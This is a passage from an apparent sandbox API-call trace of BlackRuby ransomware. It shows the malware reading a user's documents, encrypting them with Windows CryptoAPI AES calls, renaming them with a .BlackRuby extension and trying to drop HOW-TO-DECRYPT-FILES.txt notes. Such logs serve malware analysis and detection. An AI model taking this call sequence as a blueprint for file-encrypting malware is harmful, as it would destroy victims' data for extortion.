ftCreationTime.dwHighDateTime=0x1d34e4f, ftLastAccessTime.dwLowDateTime=0x1aa9e50, ftLastAccessTime.dwHighDateTime=0x1d34fff, ftLastWriteTime.dwLowDateTime=0x1aa9e50, ftLastWriteTime.dwHighDateTime=0x1d34fff, nFileSizeHigh=0x0, nFileSizeLow=0xa993)) returned 1 [0059.245] GetLastError () returned 0x5 [0059.245] SetErrorMode (uMode=0x0) returned 0x1 [0059.245] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\t_92bBPTvh4ViPSD7x.odp", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\t_92bBPTvh4ViPSD7x.odp", lpFilePart=0x0) returned 0x77 [0059.245] GetLastError () returned 0x5 [0059.245] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\t_92bBPTvh4ViPSD7x.odp", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\t_92bBPTvh4ViPSD7x.odp", lpFilePart=0x0) returned 0x77 [0059.245] GetLastError () returned 0x5 [0059.245] SetErrorMode (uMode=0x1) returned 0x0 [0059.245] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\t_92bBPTvh4ViPSD7x.odp" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\t_92bbptvh4vipsd7x.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.245] GetLastError () returned 0x0 [0059.245] GetFileType (hFile=0x184) returned 0x1 [0059.245] SetErrorMode (uMode=0x0) returned 0x1 [0059.246] GetFileType (hFile=0x184) returned 0x1 [0059.246] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0xa993 [0059.246] GetLastError () returned 0x0 [0059.246] ReadFile (in: hFile=0x184, lpBuffer=0x1bca4b0, nNumberOfBytesToRead=0xa993, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x1bca4b0*, lpNumberOfBytesRead=0x18eb68*=0xa993, lpOverlapped=0x0) returned 1 [0059.246] GetLastError () returned 0x0 [0059.246] CloseHandle (hObject=0x184) returned 1 [0059.247] GetLastError () returned 0x0 [0059.247] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\t_92bBPTvh4ViPSD7x.odp", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\t_92bBPTvh4ViPSD7x.odp", lpFilePart=0x0) returned 0x77 [0059.247] GetLastError () returned 0x0 [0059.247] SetErrorMode (uMode=0x1) returned 0x0 [0059.247] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\t_92bBPTvh4ViPSD7x.odp" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\t_92bbptvh4vipsd7x.odp"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33d13d50, ftCreationTime.dwHighDateTime=0x1d34e4f, ftLastAccessTime.dwLowDateTime=0x1aa9e50, ftLastAccessTime.dwHighDateTime=0x1d34fff, ftLastWriteTime.dwLowDateTime=0x1aa9e50, ftLastWriteTime.dwHighDateTime=0x1d34fff, nFileSizeHigh=0x0, nFileSizeLow=0xa993)) returned 1 [0059.247] GetLastError () returned 0x0 [0059.247] SetErrorMode (uMode=0x0) returned 0x1 [0059.258] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c39c30, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x3609e0) returned 1 [0059.258] GetLastError () returned 0x0 [0059.258] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.258] GetLastError () returned 0x0 [0059.263] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.263] GetLastError () returned 0x0 [0059.263] CryptDuplicateKey (in: hKey=0x3609e0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360d20) returned 1 [0059.263] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.263] GetLastError () returned 0x0 [0059.263] CryptSetKeyParam (hKey=0x360d20, dwParam=0x4, pbData=0x1c66c7c*=0x1, dwFlags=0x0) returned 1 [0059.263] GetLastError () returned 0x0 [0059.263] CryptSetKeyParam (hKey=0x360d20, dwParam=0x1, pbData=0x1c66c48, dwFlags=0x0) returned 1 [0059.263] GetLastError () returned 0x0 [0059.263] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c66cc4*, pdwDataLen=0x18eb58*=0xaa90, dwBufLen=0xaa90 | out: pbData=0x1c66cc4*, pdwDataLen=0x18eb58*=0xaa90) returned 1 [0059.263] GetLastError () returned 0x0 [0059.263] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c7c210*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1c7c210*, pdwDataLen=0x18eb70*=0x10) returned 1 [0059.263] GetLastError () returned 0x0 [0059.264] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c7c240*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1c7c240*, pdwDataLen=0x18eb78*=0x10) returned 1 [0059.264] GetLastError () returned 0x0 [0059.264] CryptDestroyKey (hKey=0x3609e0) returned 1 [0059.264] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0059.264] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0059.264] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\t_92bBPTvh4ViPSD7x.odp", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\t_92bBPTvh4ViPSD7x.odp", lpFilePart=0x0) returned 0x77 [0059.264] GetLastError () returned 0x0 [0059.264] SetErrorMode (uMode=0x1) returned 0x0 [0059.265] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\t_92bBPTvh4ViPSD7x.odp" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\t_92bbptvh4vipsd7x.odp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.266] GetLastError () returned 0xb7 [0059.266] GetFileType (hFile=0x184) returned 0x1 [0059.266] SetErrorMode (uMode=0x0) returned 0x1 [0059.266] GetFileType (hFile=0x184) returned 0x1 [0059.266] WriteFile (in: hFile=0x184, lpBuffer=0x1c7c270*, nNumberOfBytesToWrite=0xaaa0, lpNumberOfBytesWritten=0x18eb74, lpOverlapped=0x0 | out: lpBuffer=0x1c7c270*, lpNumberOfBytesWritten=0x18eb74*=0xaaa0, lpOverlapped=0x0) returned 1 [0059.267] GetLastError () returned 0xb7 [0059.267] CloseHandle (hObject=0x184) returned 1 [0059.268] GetLastError () returned 0xb7 [0059.268] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\t_92bBPTvh4ViPSD7x.odp", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\t_92bBPTvh4ViPSD7x.odp", lpFilePart=0x0) returned 0x77 [0059.268] GetLastError () returned 0xb7 [0059.268] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\Encrypted_Nk0iHhIgXtAa9WTjxXAwIJ7urA6DlIrApNXV1io09pZtqYO.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\Encrypted_Nk0iHhIgXtAa9WTjxXAwIJ7urA6DlIrApNXV1io09pZtqYO.BlackRuby", lpFilePart=0x0) returned 0xa4 [0059.268] GetLastError () returned 0xb7 [0059.268] SetErrorMode (uMode=0x1) returned 0x0 [0059.268] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\t_92bBPTvh4ViPSD7x.odp" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\t_92bbptvh4vipsd7x.odp"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33d13d50, ftCreationTime.dwHighDateTime=0x1d34e4f, ftLastAccessTime.dwLowDateTime=0x1aa9e50, ftLastAccessTime.dwHighDateTime=0x1d34fff, ftLastWriteTime.dwLowDateTime=0x2b863900, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xaaa0)) returned 1 [0059.268] GetLastError () returned 0xb7 [0059.268] SetErrorMode (uMode=0x0) returned 0x1 [0059.268] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\t_92bBPTvh4ViPSD7x.odp" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\t_92bbptvh4vipsd7x.odp"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\Encrypted_Nk0iHhIgXtAa9WTjxXAwIJ7urA6DlIrApNXV1io09pZtqYO.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\encrypted_nk0ihhigxtaa9wtjxxawij7ura6dlirapnxv1io09pztqyo.blackruby")) returned 1 [0059.269] GetLastError () returned 0xb7 [0059.269] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x79 [0059.269] GetLastError () returned 0xb7 [0059.269] SetErrorMode (uMode=0x1) returned 0x0 [0059.269] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.270] GetLastError () returned 0x5 [0059.271] SetErrorMode (uMode=0x0) returned 0x1 [0059.271] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\yXX8bNWN51A.odt", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\yXX8bNWN51A.odt", lpFilePart=0x0) returned 0x70 [0059.271] GetLastError () returned 0x5 [0059.271] SetErrorMode (uMode=0x1) returned 0x0 [0059.271] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\yXX8bNWN51A.odt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\yxx8bnwn51a.odt"), fInfoLevelId=0x0, lpFileInformation=0x1ca4554 | out: lpFileInformation=0x1ca4554*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93c56f00, ftCreationTime.dwHighDateTime=0x1d34ea0, ftLastAccessTime.dwLowDateTime=0x6ca1aa70, ftLastAccessTime.dwHighDateTime=0x1d35818, ftLastWriteTime.dwLowDateTime=0x6ca1aa70, ftLastWriteTime.dwHighDateTime=0x1d35818, nFileSizeHigh=0x0, nFileSizeLow=0xfbbe)) returned 1 [0059.271] GetLastError () returned 0x5 [0059.271] SetErrorMode (uMode=0x0) returned 0x1 [0059.272] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\yXX8bNWN51A.odt", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\yXX8bNWN51A.odt", lpFilePart=0x0) returned 0x70 [0059.272] GetLastError () returned 0x5 [0059.272] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\yXX8bNWN51A.odt", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\yXX8bNWN51A.odt", lpFilePart=0x0) returned 0x70 [0059.272] GetLastError () returned 0x5 [0059.272] SetErrorMode (uMode=0x1) returned 0x0 [0059.272] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\yXX8bNWN51A.odt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\yxx8bnwn51a.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.272] GetLastError () returned 0x0 [0059.272] GetFileType (hFile=0x184) returned 0x1 [0059.272] SetErrorMode (uMode=0x0) returned 0x1 [0059.272] GetFileType (hFile=0x184) returned 0x1 [0059.272] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0xfbbe [0059.272] GetLastError () returned 0x0 [0059.272] ReadFile (in: hFile=0x184, lpBuffer=0x1ca61f0, nNumberOfBytesToRead=0xfbbe, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x1ca61f0*, lpNumberOfBytesRead=0x18eb68*=0xfbbe, lpOverlapped=0x0) returned 1 [0059.273] GetLastError () returned 0x0 [0059.273] CloseHandle (hObject=0x184) returned 1 [0059.273] GetLastError () returned 0x0 [0059.273] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\yXX8bNWN51A.odt", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\yXX8bNWN51A.odt", lpFilePart=0x0) returned 0x70 [0059.273] GetLastError () returned 0x0 [0059.273] SetErrorMode (uMode=0x1) returned 0x0 [0059.273] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\yXX8bNWN51A.odt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\yxx8bnwn51a.odt"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93c56f00, ftCreationTime.dwHighDateTime=0x1d34ea0, ftLastAccessTime.dwLowDateTime=0x6ca1aa70, ftLastAccessTime.dwHighDateTime=0x1d35818, ftLastWriteTime.dwLowDateTime=0x6ca1aa70, ftLastWriteTime.dwHighDateTime=0x1d35818, nFileSizeHigh=0x0, nFileSizeLow=0xfbbe)) returned 1 [0059.273] GetLastError () returned 0x0 [0059.273] SetErrorMode (uMode=0x0) returned 0x1 [0059.273] CryptAcquireContextW (in: phProv=0x18eb30, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb30*=0x37c790) returned 1 [0059.274] GetLastError () returned 0x0 [0059.308] CryptImportKey (in: hProv=0x37c790, pbData=0x1d1fda8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360b60) returned 1 [0059.309] GetLastError () returned 0x0 [0059.309] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.309] GetLastError () returned 0x0 [0059.317] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.317] GetLastError () returned 0x0 [0059.317] CryptDuplicateKey (in: hKey=0x360b60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360aa0) returned 1 [0059.317] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.317] GetLastError () returned 0x0 [0059.317] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x4, pbData=0x1b5d594*=0x1, dwFlags=0x0) returned 1 [0059.317] GetLastError () returned 0x0 [0059.317] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x1, pbData=0x1b5d560, dwFlags=0x0) returned 1 [0059.317] GetLastError () returned 0x0 [0059.317] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b5d5dc*, pdwDataLen=0x18eb58*=0xfcb0, dwBufLen=0xfcb0 | out: pbData=0x1b5d5dc*, pdwDataLen=0x18eb58*=0xfcb0) returned 1 [0059.317] GetLastError () returned 0x0 [0059.318] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b7cf68*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1b7cf68*, pdwDataLen=0x18eb70*=0x10) returned 1 [0059.318] GetLastError () returned 0x0 [0059.318] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b7cf98*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1b7cf98*, pdwDataLen=0x18eb78*=0x10) returned 1 [0059.318] GetLastError () returned 0x0 [0059.318] CryptDestroyKey (hKey=0x360b60) returned 1 [0059.318] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0059.318] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0059.318] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\yXX8bNWN51A.odt", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\yXX8bNWN51A.odt", lpFilePart=0x0) returned 0x70 [0059.318] GetLastError () returned 0x0 [0059.318] SetErrorMode (uMode=0x1) returned 0x0 [0059.318] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\yXX8bNWN51A.odt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\yxx8bnwn51a.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.319] GetLastError () returned 0xb7 [0059.319] GetFileType (hFile=0x184) returned 0x1 [0059.320] SetErrorMode (uMode=0x0) returned 0x1 [0059.320] GetFileType (hFile=0x184) returned 0x1 [0059.321] CloseHandle (hObject=0x184) returned 1 [0059.321] GetLastError () returned 0xb7 [0059.321] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\yXX8bNWN51A.odt", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\yXX8bNWN51A.odt", lpFilePart=0x0) returned 0x70 [0059.321] GetLastError () returned 0xb7 [0059.321] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\Encrypted_TPmiMbqWyjNuGDplANA4uYvwnpImjk2dbDsB9.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\Encrypted_TPmiMbqWyjNuGDplANA4uYvwnpImjk2dbDsB9.BlackRuby", lpFilePart=0x0) returned 0x9a [0059.321] GetLastError () returned 0xb7 [0059.321] SetErrorMode (uMode=0x1) returned 0x0 [0059.321] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\yXX8bNWN51A.odt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\yxx8bnwn51a.odt"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93c56f00, ftCreationTime.dwHighDateTime=0x1d34ea0, ftLastAccessTime.dwLowDateTime=0x6ca1aa70, ftLastAccessTime.dwHighDateTime=0x1d35818, ftLastWriteTime.dwLowDateTime=0x2b8d5d20, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xfcc0)) returned 1 [0059.321] GetLastError () returned 0xb7 [0059.321] SetErrorMode (uMode=0x0) returned 0x1 [0059.321] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\yXX8bNWN51A.odt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\yxx8bnwn51a.odt"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\Encrypted_TPmiMbqWyjNuGDplANA4uYvwnpImjk2dbDsB9.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\encrypted_tpmimbqwyjnugdplana4uyvwnpimjk2dbdsb9.blackruby")) returned 1 [0059.322] GetLastError () returned 0xb7 [0059.322] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A 